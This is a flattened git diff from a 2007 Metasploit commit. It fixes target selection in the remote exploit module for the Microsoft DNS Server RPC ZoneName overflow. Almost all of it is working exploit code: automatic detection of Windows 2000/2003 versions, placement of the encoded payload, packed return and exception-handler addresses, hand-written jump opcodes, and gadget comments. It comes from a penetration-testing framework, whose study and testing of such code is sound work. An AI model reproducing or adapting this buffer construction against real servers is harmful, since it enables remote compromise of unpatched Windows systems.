Fix for the crash error when a specific target is selected

git-svn-id: file:///home/svn/framework3/trunk@5016 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-07-03 04:21:44 +00:00
parent d0b15d3d72
commit fb7291877d
1 changed files with 16 additions and 11 deletions

View File

@ -124,6 +124,9 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
print_status("Discovered Microsoft DNS Server RPC service on port #{dport}") print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
end end
mytarget = nil
if (target.name =~ /Automatic/) if (target.name =~ /Automatic/)
# scheduler service is only available on 2k3 SP0 and 2000 # scheduler service is only available on 2k3 SP0 and 2000
@ -131,24 +134,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
if (not schedport) if (not schedport)
print_status("Detected a Windows 2003 SP1-SP2 target...") print_status("Detected a Windows 2003 SP1-SP2 target...")
target = gettarget('2003SP12') mytarget = gettarget('2003SP12')
else else
# only available on 2003 SP0 # only available on 2003 SP0
schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp') schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp')
if (not schedport) if (not schedport)
print_status("Detected a Windows 2000 SP0-SP4 target...") print_status("Detected a Windows 2000 SP0-SP4 target...")
target = gettarget('2000') mytarget = gettarget('2000')
else else
print_status("Detected a Windows 2003 SP0 target...") print_status("Detected a Windows 2003 SP0 target...")
target = gettarget('2003SP0') mytarget = gettarget('2003SP0')
end end
end end
if (not target) if (not mytarget)
print_status("There is no available target for this locale") print_status("There is no available target for this locale")
return return
end end
else
mytarget = target
end end
@ -170,7 +175,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
txt[0, payload.encoded.length] = payload.encoded txt[0, payload.encoded.length] = payload.encoded
off = target['Off'] off = target['Off']
txt[ off ] = [target.ret].pack('V') txt[ off ] = [mytarget.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06" txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
@ -178,11 +183,11 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
txt[0, payload.encoded.length] = payload.encoded txt[0, payload.encoded.length] = payload.encoded
off = target['Off'] off = target['Off']
txt[ off ] = [target['Rets'][0]].pack('V') # __except_handler3 txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
txt[ off - 4, 2] = "\xeb\x16" txt[ off - 4, 2] = "\xeb\x16"
# addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9) # addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9)
addr = target['Rets'][1] - 4 addr = mytarget['Rets'][1] - 4
addr1 = addr / 2 addr1 = addr / 2
addr2 = addr1 + addr % 2 addr2 = addr1 + addr % 2
addr1 = addr1 + (addr2 % 12) addr1 = addr1 + (addr2 % 12)
@ -200,12 +205,12 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
# 0x77f443d5 leave ; mov esp, ebp # 0x77f443d5 leave ; mov esp, ebp
# 0x77f443d6 retn ; ret # 0x77f443d6 retn ; ret
txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V') # jmp esp
txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
elsif (target['OS'] =~ /2003SP12/) elsif (mytarget['OS'] =~ /2003SP12/)
off = target['Off'] off = mytarget['Off']
ib = target['IB'] ib = mytarget['IB']
txt[ off ] = [ib + 0x2566].pack('V') txt[ off ] = [ib + 0x2566].pack('V')